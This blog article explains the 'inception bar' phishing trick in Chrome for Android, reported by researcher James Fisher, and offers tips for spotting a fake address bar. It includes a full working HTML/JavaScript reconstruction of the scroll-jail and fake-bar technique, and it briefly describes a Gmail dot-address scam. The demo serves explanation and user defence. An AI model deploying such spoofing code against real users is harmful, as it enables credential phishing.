This Loophole in Chrome for Android Allows Phishing Attackers to Trick Users with Fake Address Bar


In the browser world, Google Chrome comes out on top, and for good reason. Besides being easy to use, it has a thriving extension ecosystem, a robust feature set, and versions for nearly all major platforms. Because Chrome is the most popular browser, some nefarious developers see it as an avenue for getting sensitive information out of unsuspecting users.

Let’s face it: most people rarely check the address bar in their browser to confirm where they really are. To make it worse, Chrome for Android hides the address bar once you scroll down a page. So if you have not been paying attention while browsing on your phone, beware of the fake address bar on Android.

According to security researcher James Fisher, there is a quirk in Google Chrome that lets phishing attackers display a fake address bar in Chrome for Android while the genuine one stays hidden.

Fake Address Bar Trick on Android Has Been Exposed

Fisher showed on his blog how an attacker can make a page appear to be hosted on the website of HSBC, a reputable bank.

A phisher uses the fake address bar on Chrome for Android to exploit a lapse in the victim’s attention. For the trick to succeed, the attacker relies on users not looking closely after they have scrolled down. Normally, when you scroll down in Chrome for Android, the top section of the browser, which holds the tabs button and the address bar, slides out of view to give the page more space.

The inception bar, as Fisher calls it, can also keep the real address bar from reappearing when you scroll back up. Ordinarily, when you scroll up, Chrome for Android redisplays the real address bar. Fisher pointed out that if the fake bar on its own does not fool a user, the attacker can add a tall padding element that keeps the outer page scrolled down, so Chrome never gets a reason to bring its own address bar back.

Fisher then showed that once Chrome has hidden the genuine address bar, the attacker can move the entire page content into a “scroll jail”: a viewport-sized element with its own scrolling. The outcome is a web page within a web page. Because the jail has its own scrollable area, users believe they are scrolling up the page when they are really scrolling within the jail, and the outer page, whose scrolling is what Chrome reacts to, never moves.
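To make the mechanism concrete, the following is a minimal reconstruction of the structure the article describes (a normal page, a tall padding element, a scroll jail, and a fake bar pinned to the top of the jail). It was written for this page as an added illustration and is neither Fisher’s code nor anything published by Google; the element names, the 120 px scroll threshold and the text shown in the fake bar are assumptions, and the fake bar is a plain grey box rather than a screenshot of a real browser bar. Open it in Chrome for Android and scroll down.

```html
<!doctype html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
  html, body { margin: 0; }
  #content { padding: 12px; font-family: sans-serif; }
  /* Tall padding: the real page stays scrolled down after the jail takes over,
     so Chrome has no reason to bring its own bar back. */
  #padding { height: 300vh; }

  /* The scroll jail: covers the viewport, sits above the real page and owns
     all scrolling once shown. Hidden until Chrome has hidden its own bar. */
  #jail {
    display: none; position: fixed; top: 0; left: 0; right: 0; bottom: 0;
    overflow-y: scroll; background: #fff;
  }
  /* The fake address bar: an ordinary page element pinned to the top of the
     jail. Fisher's demo used a screenshot; a styled div stands in here. */
  #inception-bar {
    position: sticky; top: 0; height: 56px; line-height: 56px; padding: 0 12px;
    background: #f2f2f2; border-bottom: 1px solid #ccc;
    font-family: sans-serif; font-size: 16px; color: #333;
  }
</style>
</head>
<body>
<div id="content">
  <h1>Demo page</h1>
  <p>Scroll down in Chrome for Android. Once the real address bar slides
     away, this content is moved into a scroll jail with a fake bar on top.</p>
</div>
<div id="padding"></div>
<div id="jail"></div>

<script>
  // Added demo code reconstructing the "inception bar" described above;
  // names and the scroll threshold are assumptions, not documented values.
  const content = document.getElementById('content');
  const jail = document.getElementById('jail');
  let jailed = false;

  function buildInceptionBar() {
    const bar = document.createElement('div');
    bar.id = 'inception-bar';
    // Hypothetical placeholder text; a real lure would imitate a target URL.
    bar.textContent = 'example.test  (fake bar drawn by the page)';
    return bar;
  }

  window.addEventListener('scroll', () => {
    // Chrome for Android hides its toolbar after the user scrolls down a bit;
    // 120 px is a guess at "far enough", not a value Chrome documents.
    if (jailed || window.scrollY < 120) return;
    jailed = true;

    // Build the page within a page: fake bar first, then the real content.
    jail.appendChild(buildInceptionBar());
    jail.appendChild(content);
    jail.style.display = 'block';
    // Start the jail at the same offset so the hand-over is not noticeable.
    jail.scrollTop = window.scrollY;

    // From here on every swipe scrolls the jail, not the document, so the
    // outer page stays scrolled down and Chrome never re-shows the real bar.
  });
</script>
</body>
</html>
```

Because the fake bar is just another element in the page, it knows nothing about the browser around it: it cannot read the real tab count and it does not change colour with Chrome’s own UI, which is why the checks further down this article work.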

Perhaps a more worrying implication of the fake address bar trick on Android is that users can’t easily leave the web page without accessing the address bar.

So far, there are no reported cases of users losing sensitive information to this bar-phishing trick, but now that the technique is public, attackers could use it in large-scale phishing campaigns.

How to Spot a Fake Address Bar in Chrome for Android?

As we wait for Google to release an update that closes this loophole, here are several strategies to help you spot a fake address bar:

  • One of the most effective ways of spotting a fake address bar in Chrome for Android is to lock your phone and then unlock it. Doing so forces Chrome to redisplay its real address bar, and if you are looking at a phishing page you will then see the fake address bar directly below the genuine one, even if you had scrolled down.
  • Another check is to keep an eye on the number shown in the tabs icon when you have several tabs open. A web page has no way to read your real tab count, so a fake bar will show the wrong figure.
  • With the new dark mode in Chrome for Android, a fake address bar is easier to detect. When dark mode is on, the genuine address bar and the rest of Chrome’s UI turn black, while a fake bar drawn by the page stays white, making the two easy to tell apart.

Stay Safe

Besides the above tips, it is also important to keep your phone itself secure: install Android and Chrome updates as soon as they are available, and be especially careful about entering credentials or card details when browsing on public Wi-Fi.

A point to note is that the exploit is just a proof of concept for now. But keep in mind that there is nothing that stops phishing attackers from using such vectors to collect information from unsuspecting users.

Not long ago, Fisher also raised an issue with Google’s “dots don’t matter” policy for Gmail addresses. Gmail ignores dots in the local part of an address, but most other online services treat dotted and undotted variants as different addresses, so a scammer can register accounts at those services under variants of a victim’s Gmail address while the resulting mail still lands in the victim’s inbox. Fisher described how this was used in a scam targeting Netflix subscribers.

Final Thoughts

Google has yet to issue an official response to the fake address bar trick on Android, so there is no information on when the loophole will be fixed. Nonetheless, the tips above should help you spot a fake address bar in Chrome for Android and protect your phone from this kind of attack. In any case, it pays to guard against all forms of phishing, and to be more careful whenever you browse the web using Chrome for Android. Check back on this blog to learn more about protecting your phone.
